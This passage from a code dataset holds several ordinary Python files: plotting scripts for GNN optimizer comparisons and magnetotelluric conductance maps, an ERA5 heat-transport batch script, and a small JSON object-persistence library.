"doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 35, "usage_type": "call"}, {"api_name": 
"yaml.load", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pymssql.connect", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "366404999", "text": "import os\nimport argparse\nimport pickle\nimport matplotlib.pyplot as plt\nfrom graph_neural_network import GNN\n\nplt.rcParams['savefig.bbox'] = 'tight'\nplt.rcParams['savefig.transparent'] = True\n\n\ndef main(n_epochs, n_data, path_to_datasets, save_dir):\n os.makedirs(save_dir, exist_ok=True)\n optimizers = ['SGD', 'momentumSGD', 'Adam']\n results = get_results(n_data, n_epochs, optimizers)\n with open(f'{save_dir}/results.pickle', 'wb') as r:\n pickle.dump(results, r)\n for how in optimizers:\n plot_loss(results, how, save_dir)\n plot_accuracy(results, how, save_dir)\n for data_type in ['train', 'test']:\n plot_loss_compare(results, data_type, optimizers, save_dir)\n plot_accuracy_compare(results, data_type, optimizers, save_dir)\n\n\ndef get_results(n_data, n_epochs, optimizers):\n results = {}\n for how in optimizers:\n gnn = GNN()\n ids = list(range(n_data))\n gnn.train(ids, n_epochs=n_epochs, how=how)\n results[how] = {\n 'loss':\n {'train': gnn.avg_loss['train'],\n 'test': gnn.avg_loss['test']},\n 'accuracy':\n {'train': gnn.accuracy['train'],\n 'test': gnn.accuracy['test']}}\n return results\n\n\ndef plot_loss(results, how, save_dir):\n train_loss = results[how]['loss']['train']\n test_loss = results[how]['loss']['test']\n plt.figure(figsize=(6, 4))\n plt.plot(train_loss, label='train loss')\n plt.plot(test_loss, label='test loss')\n plt.xlim(0, len(train_loss) - 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('binary closs-entropy loss')\n plt.title(f'GNN binary closs-entropy loss ({how})')\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/loss_{how}.png\")\n\n\ndef plot_accuracy(results, how, save_dir):\n train_acc = results[how]['accuracy']['train']\n test_acc = results[how]['accuracy']['test']\n plt.figure(figsize=(6, 4))\n plt.plot(train_acc, label='train accuracy')\n plt.plot(test_acc, label='test accuracy')\n plt.xlim(0, len(train_acc) - 1)\n plt.ylim(0, 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('accuracy')\n plt.title(f'GNN accuracy ({how})')\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/accuracy_{how}.png\")\n\n\ndef plot_loss_compare(results, data_type, optimizers, save_dir):\n plt.figure(figsize=(6, 4))\n for how in optimizers:\n plt.plot(results[how]['loss'][data_type], label=how)\n plt.xlim(0, len(results[optimizers[0]]['loss'][data_type]) - 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('binary closs-entropy loss')\n plt.title(\n f\"GNN loss comparison among\\n{', '.join(optimizers)}\\n\"\n f\"(using {data_type} data)\")\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/loss_compare_{data_type}.png\")\n\n\ndef plot_accuracy_compare(results, data_type, optimizers, save_dir):\n plt.figure(figsize=(6, 4))\n for how in optimizers:\n plt.plot(results[how]['accuracy'][data_type], label=how)\n plt.xlim(0, len(results[optimizers[0]]['accuracy'][data_type]) - 1)\n plt.legend(bbox_to_anchor=(1, 1), loc='upper left')\n plt.xlabel('iterations over entire dataset')\n plt.ylabel('accuracy')\n plt.title(\n f\"GNN accuracy comparison among\\n{', '.join(optimizers)}\\n\"\n f\"(using {data_type} data)\")\n plt.grid(linestyle=':')\n plt.savefig(f\"{save_dir}/accuracy_compare_{data_type}.png\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-e', '--n_epochs', type=int, 
default=50,\n help='number of iterations over entire dataset')\n parser.add_argument(\n '-n', '--n_data', type=int, default=2000,\n help='number of data')\n parser.add_argument(\n '-p', '--path_to_datasets', default='datasets',\n help='path to datasets folder')\n parser.add_argument(\n '-s', '--save_dir', default='output',\n help='path to save figures')\n args = parser.parse_args()\n main(args.n_epochs, args.n_data, args.path_to_datasets, args.save_dir)\n", "sub_path": "other/pfn2019/src/plot_results.py", "file_name": "plot_results.py", "file_ext": "py", "file_size_in_byte": 4256, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 12, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 16, "usage_type": "call"}, {"api_name": "graph_neural_network.GNN", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 63, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.grid", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 103, "usage_type": "call"}]}
+{"seq_id": "259428083", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 3 18:11:42 2021\n\n:copyright: \n Jared Peacock (jpeacock@usgs.gov)\n\n:license: MIT\n\n\"\"\"\nfrom pathlib import Path\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mtpy.modeling import modem\nfrom mtpy.utils import array2raster\n\n\ndfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\ClearLake\\modem_inv\\inv_04_topo\\cl_z03_t02_c03_071.dat\"\nd = modem.Data()\nd.read_data_file(dfn)\n\n# mfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\Geothermal\\GreatBasin\\modem_inv\\canv_01\\canv_t03_c04_084.rho\"\nmfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\ClearLake\\modem_inv\\inv_04_topo\\cl_z03_t02_c03_071.rho\"\n# mfn = r\"c:\\Users\\jpeacock\\OneDrive - DOI\\Geothermal\\Umatilla\\modem_inv\\inv_06\\um_z05_c03_083.rho\"\n# model_center = (-118.704435 + .03, 45.597757000000001 + .02)\n\nmodel_center = (-122.751369, 38.987645)\nlower_left = (-123.19, 38.63)\n\nz_dict = {\n \"surface\": np.array((0, 5000)),\n \"middle_crust\": np.array((5000, 15000)),\n \"lower_crust\": np.array((15000, 50000)),\n \"upper_mantle\": np.array((45000, 90000)),\n \"mantle\": np.array((90000, 200000)),\n}\npad = 7\n\n\nm = modem.Model()\nm.read_model_file(mfn)\ngx, gy = np.meshgrid(m.grid_east, m.grid_north)\n\nfig = plt.figure(1)\nfig.clf()\n\nfor ii, key in enumerate(z_dict.keys()):\n z = z_dict[key]\n index_min = np.where(m.grid_z <= z.min())[0][-1]\n index_max = np.where(m.grid_z >= z.max())[0][0]\n\n conductance = (1.0 / m.res_model[:, :, index_min:index_max]) * abs(\n m.grid_z[index_min:index_max]\n )\n conductance = np.log10(conductance.sum(axis=2))\n\n ax = fig.add_subplot(1, len(z_dict.keys()), 1 + ii, aspect=\"equal\")\n im = ax.pcolormesh(\n gx,\n gy,\n conductance,\n cmap=\"gnuplot2\",\n )\n # vmin=conductance[pad:-pad, pad:-pad].min(),\n # vmax=conductance[pad:-pad, pad:-pad].max())\n\n ax.scatter(\n d.station_locations.rel_east,\n d.station_locations.rel_north,\n marker=\"v\",\n s=20,\n )\n ax.set_xlim((m.grid_east[pad], m.grid_east[-pad]))\n ax.set_ylim((m.grid_north[pad], m.grid_north[-pad]))\n\n cb = plt.colorbar(im, ax=ax, shrink=0.35)\n\n array2raster.array2raster(\n Path(m.save_path)\n .joinpath(f\"canv_conductance_impedance_{key}.tiff\")\n .as_posix(),\n (lower_left[0], lower_left[1]),\n 500.0,\n 500.0,\n conductance[pad:-pad, pad:-pad],\n )\n\nplt.show()\n", "sub_path": "plot_conductance_cl.py", "file_name": "plot_conductance_cl.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "mtpy.modeling.modem.Data", "line_number": 19, "usage_type": "call"}, {"api_name": "mtpy.modeling.modem", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "mtpy.modeling.modem.Model", "line_number": 40, "usage_type": "call"}, {"api_name": "mtpy.modeling.modem", "line_number": 40, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.where", 
"line_number": 49, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "mtpy.utils.array2raster.array2raster", "line_number": 78, "usage_type": "call"}, {"api_name": "mtpy.utils.array2raster", "line_number": 78, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}]}
+{"seq_id": "499814257", "text": "import xarray as xr\nimport numpy as np\n\nimport sys \nsys.path.insert(0, '../')\nimport ERA5_functions as era_fncts\n\nweight = np.load('aht_weights.npy')\n\nyear = 2021\n\ntimes = '12'\n\nrange1 = np.asarray(range(0, 360, 10))\nrange2 = np.asarray(range(10, 370, 10))\n\nrange1 = np.append(range1, 360)\n\nif year in range(1980, 2030, 4):\n range2 = np.append(range2, 366)\nelse:\n range2 = np.append(range2, 365)\n\nvcomp, temp, sphum, geo_pot = era_fncts.aht_opener_helper(year, times)\n\nfor i in range(len(range1)):\n for t in range(range1[i], range2[i]):\n new_ds = era_fncts.aht_instant(era_fncts.aht_time_sel_helper(vcomp, temp, sphum, geo_pot, t), weight)\n if t == range1[i]:\n full_ds = new_ds\n else:\n full_ds = xr.concat([full_ds, new_ds], 'time')\n\n #full_ds\n full_ds.to_netcdf('../aht_calcs/' + str(year) + '/' + str(year) + '_' + times + 'z_' + str(range1[i]) + '_' + str(range2[i]-1))\n", "sub_path": "Calculate_AHT/do_aht_12z.py", "file_name": "do_aht_12z.py", "file_ext": "py", "file_size_in_byte": 932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 22, "usage_type": "call"}, {"api_name": "ERA5_functions.aht_opener_helper", "line_number": 24, "usage_type": "call"}, {"api_name": "ERA5_functions.aht_instant", "line_number": 28, "usage_type": "call"}, {"api_name": "ERA5_functions.aht_time_sel_helper", "line_number": 28, "usage_type": "call"}, {"api_name": "xarray.concat", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "112548916", "text": "# This file is placed in the Public Domain.\n\nimport datetime\nimport json as js\nimport os\nimport pathlib\nimport queue\nimport re\nimport threading\nimport sys\nimport types\nimport time\nimport uuid\n\n\nclass ENoFile(Exception):\n\n pass\n\n\nclass ENoModule(Exception):\n\n pass\n\n\nclass ENoType(Exception):\n\n pass\n\n\nclass ENoJSON(Exception):\n pass\n\n\n\nclass Object:\n\n __slots__ = (\"__dict__\", \"__stp__\", \"__otype__\", \"__parsed__\")\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.__otype__ = gettype(self)\n self.__parsed__ = None\n self.__stp__ = os.path.join(\n gettype(self),\n str(uuid.uuid4()),\n os.sep.join(str(datetime.datetime.now()).split()),\n )\n if args:\n self.__dict__.update(args[0])\n\n @staticmethod\n def __default__(oo):\n if isinstance(oo, Object):\n return vars(oo)\n if isinstance(oo, dict):\n return oo.items()\n if isinstance(oo, list):\n return iter(oo)\n if isinstance(oo, (type(str), type(True), type(False), type(int), type(float))):\n return oo\n return oqn(oo)\n\n def __oqn__(self):\n return \"<%s.%s object at %s>\" % (\n self.__class__.__module__,\n self.__class__.__name__,\n hex(id(self)),\n )\n\n def __contains__(self, k):\n if k in keys(self):\n return True\n return False\n\n def __delitem__(self, k):\n if k in self:\n del self.__dict__[k]\n\n def __getitem__(self, k):\n return self.__dict__[k]\n\n def __iter__(self):\n return iter(self.__dict__)\n\n def __len__(self):\n return len(self.__dict__)\n\n def __lt__(self, o):\n return len(self) < len(o)\n\n def __setitem__(self, k, v):\n self.__dict__[k] = v\n\n def __repr__(self):\n return json(self)\n\n def __str__(self):\n return str(self.__dict__)\n\n\nclass Default(Object):\n\n def __getattr__(self, k):\n try:\n return super().__getitem__(k)\n except KeyError:\n self[k] = \"\"\n return self[k]\n\n\nclass List(Object):\n\n def append(self, key, value):\n if key not in self:\n self[key] = []\n if value in self[key]:\n return\n if isinstance(value, list):\n self[key].extend(value)\n else:\n self[key].append(value)\n\n def update(self, d):\n for k, v in d.items():\n self.append(k, v)\n\n\nclass Db(Object):\n\n def all(self, otype, selector=None, index=None, timed=None):\n nr = -1\n if selector is None:\n selector = {}\n for fn in fns(otype, timed):\n o = hook(fn)\n if selector and not search(o, selector):\n continue\n if \"_deleted\" in o and o._deleted:\n continue\n nr += 1\n if index is not None and nr != index:\n continue\n yield fn, o\n\n def deleted(self, otype):\n for fn in fns(otype):\n o = hook(fn)\n if \"_deleted\" not in o or not o._deleted:\n continue\n yield fn, o\n\n def every(self, selector=None, index=None, timed=None):\n if selector is None:\n selector = {}\n nr = -1\n wd = getmain(\"wd\")\n for otype in os.listdir(os.path.join(wd, \"store\")):\n for fn in fns(otype, timed):\n o = hook(fn)\n if selector and not search(o, selector):\n continue\n if \"_deleted\" in o and o._deleted:\n continue\n nr += 1\n if index is not None and nr != index:\n continue\n yield fn, o\n\n def find(self, otype, selector=None, index=None, timed=None):\n if selector is None:\n selector = {}\n got = False\n nr = -1\n for fn in fns(otype, timed):\n o = hook(fn)\n if selector and not search(o, selector):\n continue\n if \"_deleted\" in o and o._deleted:\n continue\n nr += 1\n if index is not None and nr != index:\n continue\n got = True\n yield (fn, o)\n if got:\n return (None, None)\n return None\n\n def lastmatch(self, otype, selector=None, 
index=None, timed=None):\n res = sorted(\n self.find(otype, selector, index, timed), key=lambda x: fntime(x[0])\n )\n if res:\n return res[-1]\n return (None, None)\n\n def lastobject(self, o):\n return self.lasttype(o.__otype__)\n\n def lasttype(self, otype):\n fnn = fns(otype)\n if fnn:\n return hook(fnn[-1])\n return None\n\n def lastfn(self, otype):\n fn = fns(otype)\n if fn:\n fnn = fn[-1]\n return (fnn, hook(fnn))\n return (None, None)\n\n\ndef delkeys(self, keyz=None):\n if keyz is None:\n keyz = []\n for k in keyz:\n del self[k]\n\n\ndef dump(self):\n prv = os.sep.join(self.__stp__.split(os.sep)[:2])\n self.__stp__ = os.path.join(prv, os.sep.join(str(datetime.datetime.now()).split()))\n wd = getmain(\"wd\")\n opath = os.path.join(wd, \"store\", self.__stp__)\n cdir(opath)\n return js.dumps(self.__dict__, default=self.__default__, sort_keys=True)\n\n\ndef edit(self, setter, skip=True, skiplist=None):\n if skiplist is None:\n skiplist = []\n count = 0\n for key, v in items(setter):\n if skip and v == \"\":\n del self[key]\n continue\n if key in skiplist:\n continue\n count += 1\n if v in [\"True\", \"true\"]:\n self[key] = True\n elif v in [\"False\", \"false\"]:\n self[key] = False\n else:\n self[key] = v\n return count\n\n\ndef fmt(self, keyz=None, empty=True, skip=None, only=None):\n if keyz is None:\n keyz = keys(self)\n if not keyz:\n keyz = [\"txt\"]\n if skip is None:\n skip = []\n res = []\n txt = \"\"\n for key in sorted(keyz):\n if only and key not in only:\n continue\n if key in skip:\n continue\n if key in self:\n val = self[key]\n if empty and not val:\n continue\n val = str(val).strip()\n res.append((key, val))\n result = []\n for k, v in res:\n result.append(\"%s=%s%s\" % (k, v, \" \"))\n txt += \" \".join([x.strip() for x in result])\n return txt.strip()\n\n\ndef get(self, key, default=None):\n return self.__dict__.get(key, default)\n\ndef getcls(cn):\n mn, cn = cn.rsplit(\".\", 1)\n m = sys.modules.get(mn, None)\n if m: \n return getattr(m, cn, None)\n return None\n\ndef getrepr(txt):\n if not txt:\n return \"nill\"\n txt = txt[1:-1]\n s = txt.split()\n if s[0] == \"function\":\n s = s[1:]\n c = s[0].split(\".\")[-1]\n oid = s[-1]\n return \"%s:%s\" % (c, oid)\n\ndef getmain(name):\n return getattr(sys.modules[\"__main__\"], name, None)\n\n\ndef getwd():\n return getmain(\"wd\")\n\n\ndef getname(o):\n t = type(o)\n if t == types.ModuleType:\n return o.__name__\n if \"__self__\" in dir(o):\n return \"%s.%s\" % (o.__self__.__class__.__name__, o.__name__)\n if \"__class__\" in dir(o) and \"__name__\" in dir(o):\n return \"%s.%s\" % (o.__class__.__name__, o.__name__)\n if \"__class__\" in dir(o):\n return o.__class__.__name__\n if \"__name__\" in dir(o):\n return o.__name__\n return None\n\n\ndef keys(self):\n return self.__dict__.keys()\n\n\ndef items(self):\n try:\n return self.__dict__.items()\n except AttributeError:\n return self.items()\n\ndef last(self):\n db = Db()\n t = str(gettype(self))\n path, l = db.lastfn(t)\n if l:\n update(self, l)\n if path:\n splitted = path.split(os.sep)\n stp = os.sep.join(splitted[-4:])\n return stp\n return None\n\ndef json(self):\n s = js.dumps(self.__dict__, default=self.__default__, sort_keys=True)\n s = s.replace(\"'\", \"\\\\\\\"\")\n s = s.replace('\"', \"'\")\n return s\n\n\ndef load(self, opath):\n if opath.count(os.sep) != 3:\n raise ENoFile(opath)\n splitted = opath.split(os.sep)\n stp = os.sep.join(splitted[-4:])\n lpath = os.path.join(getwd(), 
\"store\", stp)\n if os.path.exists(lpath):\n with open(lpath, \"r\") as ofile:\n d = js.load(ofile, object_hook=Object)\n update(self, d)\n self.__stp__ = stp\n\n\ndef merge(self, d):\n for k, v in items(d):\n if not v:\n continue\n if k in self:\n if isinstance(self[k], dict):\n continue\n self[k] = self[k] + v\n else:\n self[k] = v\n\ndef oqn(self):\n return Object.__oqn__(self)\n\n\ndef overlay(self, d, keyz=None, skip=None):\n for k, v in items(d):\n if keyz and k not in keyz:\n continue\n if skip and k in skip:\n continue\n if v:\n self[k] = v\n\n\ndef register(self, k, v):\n self[str(k)] = v\n\n\ndef save(self, tab=False):\n prv = os.sep.join(self.__stp__.split(os.sep)[:2])\n self.__stp__ = os.path.join(prv, os.sep.join(str(datetime.datetime.now()).split()))\n opath = os.path.join(getwd(), \"store\", self.__stp__)\n cdir(opath)\n with open(opath, \"w\") as ofile:\n js.dump(self.__dict__, ofile, default=self.__default__, indent=4, sort_keys=True)\n os.chmod(opath, 0o444)\n return self.__stp__\n\n\ndef search(self, s):\n ok = False\n for k, v in items(s):\n vv = getattr(self, k, None)\n if v not in str(vv):\n ok = False\n break\n ok = True\n return ok\n\n\ndef set(self, key, value):\n self.__dict__[key] = value\n\n\ndef update(self, data):\n try:\n return self.__dict__.update(vars(data))\n except TypeError:\n return self.__dict__.update(data)\n\n\ndef values(self):\n return self.__dict__.values()\n\n\ndef cdir(path):\n if os.path.exists(path):\n return\n if path.split(os.sep)[-1].count(\":\") == 2:\n path = os.path.dirname(path)\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\n\ndef check(o, keyz=None):\n if keyz is None:\n keyz = []\n for k in keyz:\n if k in o:\n return True\n return False\n\ndef find(name, selector=None, index=None, timed=None):\n db = Db()\n t = getmain(\"tbl\")\n if not t:\n return\n for n in get(t.names, name, [name,],):\n for fn, o in db.find(n, selector, index, timed):\n yield fn, o\n\n\ndef fntime(daystr):\n daystr = daystr.replace(\"_\", \":\")\n datestr = \" \".join(daystr.split(os.sep)[-2:])\n if \".\" in datestr:\n datestr, rest = datestr.rsplit(\".\", 1)\n else:\n rest = \"\"\n t = time.mktime(time.strptime(datestr, \"%Y-%m-%d %H:%M:%S\"))\n if rest:\n t += float(\".\" + rest)\n else:\n t = 0\n return t\n\n\ndef fns(name, timed=None):\n if not name:\n return []\n p = os.path.join(getwd(), \"store\", name) + os.sep\n res = []\n d = \"\"\n for rootdir, dirs, _files in os.walk(p, topdown=False):\n if dirs:\n d = sorted(dirs)[-1]\n if d.count(\"-\") == 2:\n dd = os.path.join(rootdir, d)\n fls = sorted(os.listdir(dd))\n if fls:\n p = os.path.join(dd, fls[-1])\n if (\n timed\n and \"from\" in timed\n and timed[\"from\"]\n and fntime(p) < timed[\"from\"]\n ):\n continue\n if timed and timed.to and fntime(p) > timed.to:\n continue\n res.append(p)\n return sorted(res, key=fntime)\n\n\ndef gettype(o):\n return str(type(o)).split()[-1][1:-2]\n\n\ndef hook(hfn):\n if hfn.count(os.sep) > 3:\n oname = hfn.split(os.sep)[-4:]\n else:\n oname = hfn.split(os.sep)\n cname = oname[0]\n fn = os.sep.join(oname)\n mn, cn = cname.rsplit(\".\", 1)\n mod = sys.modules.get(mn, None)\n if not mod:\n raise ENoModule(mn)\n t = getattr(mod, cn, None)\n if t:\n o = t()\n load(o, fn)\n return o\n raise ENoType(cname)\n\n\ndef listfiles(workdir):\n path = os.path.join(workdir, \"store\")\n if not os.path.exists(path):\n return []\n return sorted(os.listdir(path))\n\n\ndef setwd(path):\n global wd\n wd = path\n\ndef spl(txt):\n return [x for x in txt.split(\",\") if x]\n", 
